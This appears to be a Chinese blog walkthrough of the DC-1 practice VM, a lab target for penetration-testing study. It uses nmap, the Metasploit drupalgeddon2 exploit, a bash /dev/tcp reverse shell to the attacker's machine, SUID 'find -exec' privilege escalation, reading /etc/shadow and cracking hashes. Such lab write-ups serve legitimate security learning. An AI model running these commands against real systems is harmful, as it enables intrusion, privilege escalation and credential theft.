渗透测试学习之靶机DC-1

前言
  • 开启靶机后,需要登录,感觉很真实,接下来是边学边玩吧。
    在这里插入图片描述
信息搜集
1. 用nmap探测一下信息;

由于不知道靶机的IP地址,毕竟是在虚拟机的靶机,跟kali同一个网段,探测一下同一网段存活的主机。
nmap -sP 192.168.246.0/24ping扫描该网段:
在这里插入图片描述
192.168.246.2、254是网关,138是kali的,133就肯定是靶机的地址。
nmap -sV 192.168.246.133探测端口开放与服务信息:
在这里插入图片描述

2. 探测到80端口,浏览器打开一下:

在这里插入图片描述
一个登录界面,很明显是个Drupal框架的站,下面还有powered by Drupal。
whatweb看下站点的其他信息:
whatweb http://192.168.246.133:80
在这里插入图片描述
3. robots.txt里的信息好像没看头。

使用msf框架
1. 直接上手msf

存在这么个CMS,看大佬思路是直接msf查,使用最新的那个:
search drupal
use use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.246.133
exploit
在这里插入图片描述弹回shell
在这里插入图片描述
权限是www-data。

2. 获取flag1.txt

ls查看目录信息看到flag1.txt,cat flag1.txt
在这里插入图片描述
根据flag1.txt提示,config file配置文件,百度:
在这里插入图片描述
进入目录找到settings.php文件,获得flag2.txt:
在这里插入图片描述
flag2.txt提示:暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)你能用这些证件做什么?

3. 查看数据库信息

给出的数据库操作好奇怪,一步一步试,有好多表,感觉只有users和users_roles这两个表看起来有用点。
查看users表的部分信息:
在这里插入图片描述
可能是shell问题才会这么鸡肋,弹个交互式的shell:
bash -i > & /dev/tcp/192.168.246.138/8888 0>&1
果然正常多了…
获取到的数据库信息是一样的,但是Hash值密码难以破解,重置密码
在这里插入图片描述
复制hash值后在数据库中修改,再登录admin、admin:
在这里插入图片描述
在content里发现flag3:
在这里插入图片描述
提示是使用-exec,但是需要足够权限。

4. 使用suid提权

查找符合条件的文件:
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
如果find以suid权限运行,所有通过find执行的命令都会以root权限运行;
测试一下:
touch xl
find xl -exec whoami \;
在这里插入图片描述
执行一个root权限的shell:
find xl -exec '/bin/sh' \;
在这里插入图片描述

5. 查看/etc/passwd/etc/shadow文件:文件详解

在这里插入图片描述
在这里插入图片描述
/etc/passwd各字段含义:
用户标识号:组标识号:用户名:用户主目录:命令解释程序
/etc/shadow各字段含义:
用户名:密码hash值:最近改动日期:密码不可变更天数:密码过期预警天数:密码过期宽恕天数:账号失效日期:保留的

6. /etc/passwd破解

将flag4的hash值放到shadow.txt文件中,使用John the Ripper破解一下。
在这里插入图片描述

7. ssh连接flag4

在这里插入图片描述
提示flag在root里。

8. 获取thefinalflag.txt

根据flag4.txt的提示,在root里,在第四步依据取得root权限,查看目录文件后发现最终thefinalflag.txt文件。
在这里插入图片描述

总结
  • 第一次玩这种靶机,一直迷迷糊糊的百度,看了大佬的思路,学到了。
  • 参考文章
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值